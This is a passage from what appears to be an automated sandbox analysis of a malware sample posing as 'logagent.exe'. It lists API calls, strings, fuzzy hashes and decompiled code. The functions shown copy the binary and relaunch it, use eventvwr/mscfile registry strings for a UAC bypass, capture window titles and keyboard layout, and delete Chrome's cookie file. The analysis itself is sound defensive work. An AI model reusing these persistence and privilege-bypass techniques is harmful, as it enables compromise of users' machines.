                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                  • printf.MSVCRT ref: 00402722
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                  • API String ID: 1710008465-2297210016
                                  • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                  • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030EC Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe,?), ref: 0040318F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                  • exit.MSVCRT ref: 004031D8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                  • API String ID: 2587331422-612517957
                                  • Opcode ID: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                  • Opcode Fuzzy Hash: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D64E Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$open
                                  • API String ID: 2112629403-468372309
                                  • Opcode ID: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                  • Opcode Fuzzy Hash: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D9A0 Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D9AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                    • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                  • String ID:
                                  • API String ID: 3751107300-0
                                  • Opcode ID: e15c7601431557eb5434d33a6cd385f90947e193a142b4115c909fdae08809a5
                                  • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                  • Opcode Fuzzy Hash: e15c7601431557eb5434d33a6cd385f90947e193a142b4115c909fdae08809a5
                                  • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EA96 Relevance: 27.1, APIs: 18, Instructions: 95windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowTextW.USER32 ref: 0040EAAF
                                  • IsWindowVisible.USER32 ref: 0040EAB8
                                  • sprintf.MSVCRT ref: 0040EACF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                  • String ID:
                                  • API String ID: 1480451481-0
                                  • Opcode ID: 50da3bbc057abd5acd65f029f9e80a750645bf4947171fce649c792d00c8bacc
                                  • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                  • Opcode Fuzzy Hash: 50da3bbc057abd5acd65f029f9e80a750645bf4947171fce649c792d00c8bacc
                                  • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105497C6 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 326fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wcslen.MSVCRT ref: 105497D5
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 105497F3
                                  • wcscmp.MSVCRT ref: 1054986F
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 105498B4
                                  • wcslen.MSVCRT ref: 105498CF
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 10549955
                                  • wcslen.MSVCRT ref: 105499B1
                                  • _wgetenv.MSVCRT ref: 105499DA
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 10549BAB
                                  • exit.MSVCRT ref: 10549BB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wcslen$CopyFile$CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: $ZA$(VA$6$<bA$C:\Windows\SysWOW64\logagent.exe
                                  • API String ID: 2471365703-1191138858
                                  • Opcode ID: 6595a01bfefbc4d7711554f92850df2a30bf25d81cb68a59afe5877ef214b2a6
                                  • Instruction ID: 5e4b0d8fd0361055a690d1d732cd05f8d76ce01087c66126235fad2caaebaba2
                                  • Opcode Fuzzy Hash: 6595a01bfefbc4d7711554f92850df2a30bf25d81cb68a59afe5877ef214b2a6
                                  • Instruction Fuzzy Hash: 4CC12B7290051DEBCB05ABE0EC5DDEE7B7CFF98255B54802AF912D30A0EB759904CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004071CF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E004071CF() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome Cookies found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome Cookies not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                  0x004071e4
                                  0x004071ef
                                  0x004071f6
                                  0x004071fa
                                  0x00407205
                                  0x0040720e
                                  0x0040721d
                                  0x00407271
                                  0x00407277
                                  0x0040727f
                                  0x00407281
                                  0x00407284
                                  0x00000000
                                  0x0040728a
                                  0x00407226
                                  0x00407227
                                  0x0040725c
                                  0x00407238
                                  0x0040723e
                                  0x00407244
                                  0x0040724f
                                  0x00000000
                                  0x00407255
                                  0x0040722a
                                  0x00407233
                                  0x00000000
                                  0x00407236
                                  0x0040722c
                                  0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 004071E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                  • GetLastError.KERNEL32 ref: 0040721F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                  Strings
                                  • [Chrome Cookies not found], xrefs: 00407239
                                  • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                  • UserProfile, xrefs: 004071DF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 3740952235-304995407
                                  • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                  • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041203B Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 61timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E0041203B(char _a4, char _a20) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				int _t18;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;

				if( *0x41bcac != 0) {
					GetLocalTime( &_v20);
